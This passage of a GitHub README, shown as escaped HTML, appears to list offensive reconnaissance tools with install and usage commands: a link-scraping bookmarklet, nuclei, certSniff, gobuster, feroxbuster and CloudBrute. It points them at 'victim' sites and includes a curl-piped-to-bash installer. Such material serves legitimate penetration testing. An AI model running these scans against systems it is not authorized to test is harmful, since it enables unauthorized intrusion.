class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003edocumentElement\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eouterHTML\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ematches\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003epageContent\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ematchAll\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eregex\u003c/span\u003e\u003cspan 
class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efor\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003econst\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ematch\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eof\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ematches\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eadd\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ematch\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e \u003cspan class=\"pl-en\"\u003ewriteResults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eforEach\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003edocument\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ewrite\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan 
class=\"pl-c1\"\u003e+\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"\u0026lt;br\u0026gt;\"\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-en\"\u003esetTimeout\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ewriteResults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e3e3\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Bookmarklet)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreate a bookmarklet...\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eRight click your bookmark bar\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eClick 'Add Page'\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePaste the above JavaScript in the 'url' box\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eClick 'Save'\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e...then visit the victim page in the browser and click the bookmarklet.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png\" alt=\"image\" 
style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Console)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003ePaste the above JavaScript into the console window \u003ccode\u003eF12\u003c/code\u003e and press enter.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/projectdiscovery/nuclei\"\u003enuclei\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-nuclei\" class=\"anchor\" aria-label=\"Permalink: 🔙nuclei\" href=\"#nuclei\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFast vulnerability scanner that uses .yaml templates to search for specific issues.\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest\"\u003e\u003cpre\u003ego install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"cat domains.txt | nuclei -t /PATH/nuclei-templates/\"\u003e\u003cpre\u003ecat domains.txt \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e nuclei -t /PATH/nuclei-templates/\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/A-poc/certSniff\"\u003ecertSniff\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-certsniff\" class=\"anchor\" aria-label=\"Permalink: 🔙certSniff\" href=\"#certsniff\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 
1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ecertSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/A-poc/certSniff\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e certSniff/\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 certSniff.py -f example.txt\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ecertSniff\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003epy\u003c/span\u003e \u003cspan 
class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ef\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eexample\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003etxt\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.kali.org/tools/gobuster/\" rel=\"nofollow\"\u003egobuster\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gobuster\" class=\"anchor\" aria-label=\"Permalink: 🔙gobuster\" href=\"#gobuster\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for brute forcing file/folder paths on a victim website.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight 
highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install gobuster\"\u003e\u003cpre\u003esudo apt install gobuster\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"gobuster dir -u \u0026quot;https://google.com\u0026quot; -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20\"\u003e\u003cpre\u003egobuster dir -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://google.com\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/epi052/feroxbuster\"\u003eferoxbuster\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-feroxbuster\" class=\"anchor\" aria-label=\"Permalink: 🔙feroxbuster\" href=\"#feroxbuster\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 
0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Kali)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt update \u0026amp;\u0026amp; sudo apt install -y feroxbuster\"\u003e\u003cpre\u003esudo apt update \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo apt install -y feroxbuster\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Mac)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash\"\u003e\u003cpre\u003ecurl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e 
bash\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\\feroxbuster.zip\n.\\feroxbuster\\feroxbuster.exe -V\"\u003e\u003cpre\u003eInvoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\u003cspan class=\"pl-cce\"\u003e\\f\u003c/span\u003eeroxbuster.zip\n.\u003cspan class=\"pl-cce\"\u003e\\f\u003c/span\u003eeroxbuster\u003cspan class=\"pl-cce\"\u003e\\f\u003c/span\u003eeroxbuster.exe -V\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://epi052.github.io/feroxbuster-docs/docs/installation/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url\n./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx\n\n# Scan with headers\n./feroxbuster -u http://127.1 -H Accept:application/json \u0026quot;Authorization: Bearer {token}\u0026quot;\n\n# Read URLs from stdin\ncat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy requests through burpsuite\n./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Add .pdf, .js, .html, .php, .txt, .json, 
and .docx to each url\u003c/span\u003e\n./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan with headers\u003c/span\u003e\n./feroxbuster -u http://127.1 -H Accept:application/json \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eAuthorization: Bearer {token}\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Read URLs from stdin\u003c/span\u003e\ncat targets \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e fff -s 200 -o js-files\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Proxy requests through burpsuite\u003c/span\u003e\n./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eFull usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca 
href=\"https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif\" rel=\"nofollow\"\u003ehttps://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/0xsha/CloudBrute\"\u003eCloudBrute\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-cloudbrute\" class=\"anchor\" aria-label=\"Permalink: 🔙CloudBrute\" href=\"#cloudbrute\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eCloud detection (IPINFO API and Source Code)\u003c/li\u003e\n\u003cli\u003eFast (concurrent)\u003c/li\u003e\n\u003cli\u003eCross Platform (windows, linux, mac)\u003c/li\u003e\n\u003cli\u003eUser-Agent Randomization\u003c/li\u003e\n\u003cli\u003eProxy Randomization (HTTP, Socks5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDownload the latest \u003ca href=\"https://github.com/0xsha/CloudBrute/releases\"\u003erelease\u003c/a\u003e for your system and follow the usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \u0026quot;./data/storage_small.txt\u0026quot;\n\n# Output results to file\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\u003c/span\u003e\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e./data/storage_small.txt\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Output results to file\u003c/span\u003e\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/0xsha/CloudBrute\"\u003ehttps://github.com/0xsha/CloudBrute\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.kali.org/tools/dnsrecon/#dnsrecon\" rel=\"nofollow\"\u003ednsrecon\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dnsrecon\" class=\"anchor\" aria-label=\"Permalink: 🔙dnsrecon\" href=\"#dnsrecon\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 